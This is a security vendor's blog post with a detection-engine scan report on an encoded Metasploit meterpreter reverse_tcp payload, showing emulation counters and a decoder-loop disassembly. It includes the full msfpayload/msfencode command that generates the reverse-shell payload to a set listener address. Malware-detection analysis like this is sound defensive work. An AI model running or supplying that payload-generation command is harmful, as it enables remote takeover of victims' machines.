Quttera web security blog: Quttera investigation engine scan report for Metasploit's reverse_tcp payload encoded with x86/shikata_ga

Quttera investigation engine statistics of the detected payload

Offset of the detected payload: 0

Payload generation command

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 R| msfencode -e x86/shikata_ga_nai -t raw

Payload emulation counters:

WRITES_TO_PROCESS_STACK_MEMORY	0
BUFFER_INSIDE_WRITES_COUNT	24
REFERENCES_TO_PROCESS_INTERNALS	0
BUFFER_OUTSIDE_WRITES_COUNT	0
FAR_JUMPS_COUNT	0
FULLY_INITIALIZED_INSTRUCTIONS	99
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES	1
PROC_CALLS_INSIDE_INV_BUFFER	0
BUFFER_OUTSIDE_READS_COUNT	1
UNDEFINED_DIRECT_CALLS	0
JUMPS_INSIDE_INV_BUFFER	23
CORRECTLY_PARSED_INSTRUCTIONS	100
MEMORY_MODIFYING_MATH_INSTRUCTIONS	0
BUFFER_INSIDE_READS_COUNT	24
SYSTEM_CALLS_COUNT	0
UNRECOGNIZED_CALL_TARGETS	0
REFERENCES_TO_PROCESS_IMPORTS	0
CORRECT_PROCEDURES_CALLS	0
EIP_RETRIEVAL_INSTRUCTIONS	1
JUMPS_TO_PROCESS_INTERNALS	0
EXECUTED_ARITHMETIC_INSTRUCTIONS	24
CALLS_TARGETED_IMPORTS_SECTION	0
UNRECOGNIZED_JUMP_TARGETS	0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS	0
REFERENCES_TO_PROCESS_EXPORTS	0
EXECUTES_BITS_OPERATING_INSTRUCTIONS	0
IMMEDIATE_OPERANDS_INSTRUCTIONS	0
INDIRECT_BUFFER_REFERENCES	23
MAX_WRITTEN_MEMORY_BLOCK	0
CORRECTLY_EXECUTED_INSTRUCTIONS	100
READS_FROM_PROCESS_STACK_MEMORY	1
CALLS_TARGETED_EXPORTS_SECTION	0

Detection disassembly:

MOV EBX (0x00000000),0x7D1F6180
FCMOVB ST0 (0x0000000000000000),ST3 (0x0000000000000001)
FNSTENV [ESP - 0xC] (0x087A29DB)
POP EDX (0x00000000)
XOR ECX (0x00000000),ECX (0x00000000)
MOV CL (0x00),0x49
XOR DS:[EDX + 0x14] (0xBFC74815),EBX (0x7D1F6180)	;investigation buffer write instruction
ADD EBX (0x7D1F6180),DS:[EDX + 0x14] (0xBFC74815)	;investigation buffer read instruction
ADD EDX (0xBFC74801),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74819),EBX (0x661C5762)	;investigation buffer write instruction
ADD EBX (0x661C5762),DS:[EDX + 0x14] (0xBFC74819)	;investigation buffer read instruction
ADD EDX (0xBFC74805),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7481D),EBX (0x661C57EB)	;investigation buffer write instruction
ADD EBX (0x661C57EB),DS:[EDX + 0x14] (0xBFC7481D)	;investigation buffer read instruction
ADD EDX (0xBFC74809),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74821),EBX (0x9801E14B)	;investigation buffer write instruction
ADD EBX (0x9801E14B),DS:[EDX + 0x14] (0xBFC74821)	;investigation buffer read instruction
ADD EDX (0xBFC7480D),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74825),EBX (0xEA8D461D)	;investigation buffer write instruction
ADD EBX (0xEA8D461D),DS:[EDX + 0x14] (0xBFC74825)	;investigation buffer read instruction
ADD EDX (0xBFC74811),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74829),EBX (0xF6DFD14D)	;investigation buffer write instruction
ADD EBX (0xF6DFD14D),DS:[EDX + 0x14] (0xBFC74829)	;investigation buffer read instruction
ADD EDX (0xBFC74815),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7482D),EBX (0x81F423D8)	;investigation buffer write instruction
ADD EBX (0x81F423D8),DS:[EDX + 0x14] (0xBFC7482D)	;investigation buffer read instruction
ADD EDX (0xBFC74819),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74831),EBX (0x39034C4A)	;investigation buffer write instruction
ADD EBX (0x39034C4A),DS:[EDX + 0x14] (0xBFC74831)	;investigation buffer read instruction
ADD EDX (0xBFC7481D),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74835),EBX (0x38347294)	;investigation buffer write instruction
ADD EBX (0x38347294),DS:[EDX + 0x14] (0xBFC74835)	;investigation buffer read instruction
ADD EDX (0xBFC74821),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74839),EBX (0x74E132C5)	;investigation buffer write instruction
ADD EBX (0x74E132C5),DS:[EDX + 0x14] (0xBFC74839)	;investigation buffer read instruction
ADD EDX (0xBFC74825),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7483D),EBX (0xA0E3AF26)	;investigation buffer write instruction
ADD EBX (0xA0E3AF26),DS:[EDX + 0x14] (0xBFC7483D)	;investigation buffer read instruction
ADD EDX (0xBFC74829),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74841),EBX (0xAEB37046)	;investigation buffer write instruction
ADD EBX (0xAEB37046),DS:[EDX + 0x14] (0xBFC74841)	;investigation buffer read instruction
ADD EDX (0xBFC7482D),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74845),EBX (0x9F963747)	;investigation buffer write instruction
ADD EBX (0x9F963747),DS:[EDX + 0x14] (0xBFC74845)	;investigation buffer read instruction
ADD EDX (0xBFC74831),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74849),EBX (0xF2218E99)	;investigation buffer write instruction
ADD EBX (0xF2218E99),DS:[EDX + 0x14] (0xBFC74849)	;investigation buffer read instruction
ADD EDX (0xBFC74835),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7484D),EBX (0x2E6419A9)	;investigation buffer write instruction
ADD EBX (0x2E6419A9),DS:[EDX + 0x14] (0xBFC7484D)	;investigation buffer read instruction
ADD EDX (0xBFC74839),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74851),EBX (0x6EEFE9AA)	;investigation buffer write instruction
ADD EBX (0x6EEFE9AA),DS:[EDX + 0x14] (0xBFC74851)	;investigation buffer read instruction
ADD EDX (0xBFC7483D),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74855),EBX (0xE3B06F22)	;investigation buffer write instruction
ADD EBX (0xE3B06F22),DS:[EDX + 0x14] (0xBFC74855)	;investigation buffer read instruction
ADD EDX (0xBFC74841),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74859),EBX (0x3480706C)	;investigation buffer write instruction
ADD EBX (0x3480706C),DS:[EDX + 0x14] (0xBFC74859)	;investigation buffer read instruction
ADD EDX (0xBFC74845),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7485D),EBX (0xBF98B8F7)	;investigation buffer write instruction
ADD EBX (0xBF98B8F7),DS:[EDX + 0x14] (0xBFC7485D)	;investigation buffer read instruction
ADD EDX (0xBFC74849),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74861),EBX (0x9299D94F)	;investigation buffer write instruction
ADD EBX (0x9299D94F),DS:[EDX + 0x14] (0xBFC74861)	;investigation buffer read instruction
ADD EDX (0xBFC7484D),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74865),EBX (0x1DE31632)	;investigation buffer write instruction
ADD EBX (0x1DE31632),DS:[EDX + 0x14] (0xBFC74865)	;investigation buffer read instruction
ADD EDX (0xBFC74851),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74869),EBX (0xF3E4A166)	;investigation buffer write instruction
ADD EBX (0xF3E4A166),DS:[EDX + 0x14] (0xBFC74869)	;investigation buffer read instruction
ADD EDX (0xBFC74855),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7486D),EBX (0xB416A097)	;investigation buffer write instruction
ADD EBX (0xB416A097),DS:[EDX + 0x14] (0xBFC7486D)	;investigation buffer read instruction
ADD EDX (0xBFC74859),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74871),EBX (0xC1E66243)	;investigation buffer write instruction
ADD EBX (0xC1E66243),DS:[EDX + 0x14] (0xBFC74871)	;investigation buffer read instruction

Quttera web security blog

Pages

Monday, March 18, 2013

Quttera investigation engine scan report for Metasploit's reverse_tcp payload encoded with x86/shikata_ga_nai encoder

Quttera investigation engine statistics of the detected payload

Offset of the detected payload: 0

Payload generation command

Payload emulation counters:

Read more about Quttera investigation engine here

Detection disassembly:

No comments:

Post a Comment

emergency
249$ /yr
1 domain
Initial Response Time within 4 hrs.
Manual Malware Removal / Full Website Audit
Blacklisting removal
Web Application Firewall (WAF)
Dedicated Malware Analyst
Create Account

economy
149$ /yr
1 domain
Initial Response Time within 12 hrs.
Malware clean-up
Blacklisting removal
24/7 Access to Cybersecurity Professionals
Create Account